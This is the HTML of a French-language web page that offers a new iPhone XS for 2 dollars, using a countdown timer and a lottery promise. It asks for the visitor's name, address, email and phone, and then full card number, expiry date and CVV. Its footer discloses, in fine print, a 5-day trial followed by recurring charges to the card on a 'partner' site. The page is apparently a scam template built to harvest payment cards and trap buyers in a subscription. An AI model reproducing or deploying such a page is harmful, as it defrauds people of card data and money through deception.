<title>Apple iPhone XS</title>
<section id="content">
    <div class="price-block">
        <div class="price">
            <span>Prix total</span>
            <span class="price__num">2$</span>
        </div>
    </div>
    <div class="container">
        <h1>Obtenez un nouvel Iphone X pour 2 $</h1>
        <h4>La vie est plus simple avec l'Iphone</h4>
        <div class="content">
            <div class="form-block">
                <form class="form">
                    <div class="form__head">Faire une commande</div>
                    <div class="form__row">
                        <input class="form__inp" type="text" name="firstName" placeholder="Prénom">
                    </div>
                    <div class="form__row">
                        <input class="form__inp" type="text" name="lastName" placeholder="Nom de famille">
                    </div>
                    <div class="form__row">
                        <input class="form__inp" type="text" name="email" placeholder="Adresse électronique">
                    </div>
                    <div class="form__row">
                        <input class="form__inp" type="text" name="phone" placeholder="Téléphone">
                    </div>
                    <div class="form__row">
                        <input class="form__inp" type="text" name="city" placeholder="Ville">
                    </div>
                    <div class="form__row">
                        <input class="form__inp" type="text" name="address" placeholder="Adresse">
                    </div>
                    <div class="form__row">
                        <input class="form__inp" type="text" name="zip" placeholder="Code postal"
                               maxlength="10">
                    </div>
                    <button class="form__btn-submit" type="submit" id="btn-form-submit">
                        Continuer
                    </button>
                </form>

                <form class="form-payment">
                    <div class="form-payment__row">
                        <label class="form-payment__lbl" for="card-number">Numéro de carte</label>
                        <div class="form-payment__card-block">
                            <input class="form-payment__inp form-payment__inp-card" type="text" name="cardNumber"
                                   id="card-number"
                                   placeholder="____ ____ ____ ____">
                            <span class="form-payment__card-type">
                                <img id="card-type" src="[host]/img/credit_card/unknown.png" alt="">
                            </span>
                        </div>
                    </div>
                    <div class="form-payment__row">
                        <span class="form-payment__lbl">Date d'expiration</span>
                        <select class="form-payment__inp" type="text" name="expirationMonth" id="expiration-month">
                            <option value="" disabled selected style='display:none;'>mois</option>
                            <option value="01">01</option>
                            <option value="02">02</option>
                            <option value="03">03</option>
                            <option value="04">04</option>
                            <option value="05">05</option>
                            <option value="06">06</option>
                            <option value="07">07</option>
                            <option value="08">08</option>
                            <option value="09">09</option>
                            <option value="10">10</option>
                            <option value="11">11</option>
                            <option value="12">12</option>
                        </select>
                        <select class="form-payment__inp" type="text" name="expirationYear" id="expiration-year">
                            <option value="" disabled selected style='display:none;'>année</option>
                            <option value="19">19</option>
                            <option value="20">20</option>
                            <option value="21">21</option>
                            <option value="22">22</option>
                            <option value="23">23</option>
                            <option value="24">24</option>
                            <option value="25">25</option>
                            <option value="26">26</option>
                            <option value="27">27</option>
                            <option value="28">28</option>
                            <option value="29">29</option>
                        </select>
                    </div>
                    <div class="form-payment__row">
                        <label class="form-payment__lbl" for="name">Nom</label>
                        <input class="form-payment__inp" type="text" name="name" id="name" placeholder="Name"
                               maxlength="20">
                    </div>
                    <div class="form-payment__row">
                        <label class="form-payment__lbl" for="cvv">CVV</label>
                        <input class="form-payment__inp only-number" type="text" name="cvv" id="cvv" maxlength="3"
                               placeholder="000">
                    </div>
                    <button class="form-payment__btn-submit" type="submit">
                        Confirmer le paiement
                    </button>
                </form>
            </div>

            <div class="counter-block">
                <div class="counter-block__head">Apple Iphone Xs</div>
                <div class="counter-block__price">
                    <span>Valeur</span><span class="line-through">1000$</span><br>
                    <span>Payez seulement 2 $</span>
                </div>
                <div class="counter-block__time">Temps restant</div>
                <div class="counter">
                    <div id="clock"></div>
                </div>
            </div>
        </div>
    </div>
</section>

<footer id="footer">
    <div class="container">
        <h5>Essayez de gagner les Iphone X aujourd'hui et participez à la loterie. L'heureux gagnant sera contacté par courrier électronique.</h5>
        <div class="row">
            <div class="col-lg-4">
                <p>
                    <span class="question">Comment puis-je gagner</span>
                    <span>Grâce à votre adhésion, vous participez également à notre concours pour gagner un. Nous allons tirer un gagnant tous les 600 participants. Le prochain gagnant sera tiré au sort le 02.05.2019 et sera informé directement par e-mail. Si la récompense est en rupture de stock, le gagnant recevra un produit similaire de valeur égale ou supérieure.</span>
                </p>
            </div>
            <div class="col-lg-4">
                <p>
                    <span class="question">Pas de frais cachés</span>
                    <span>Nous nous assurons que nos membres fournissent un historique détaillé des transactions afin qu'ils sachent ce qu'ils paient. Les informations de carte de crédit ne sont nécessaires que pour faciliter les achats futurs. Votre relevé de carte de crédit ne comportera aucun frais si vous ne passez pas à l’adhésion PREMIUM et ne faites pas d’achat.</span>
                </p>
            </div>
            <div class="col-lg-4">
                <p>
                    <span class="question">Pourquoi avons-nous besoin de vos informations de facturation?</span>
                    <span>En rejoignant ce service, vous bénéficierez d'une période d'essai de 5 jours du programme de notre partenaire. Si vous continuez avec un abonnement au-delà de la période d’essai de 5 jours, un montant de votre carte de crédit vous sera débité, lequel varie en fonction du choix. Lorsque votre contribution est déduite de votre carte de crédit ou de tout autre moyen de paiement, vous conservez l'accès à ces services, qui sont réservés exclusivement aux membres qui paient pour l'accès sur notre site Web partenaire.</span>
                </p>
            </div>
        </div>
    </div>
</footer>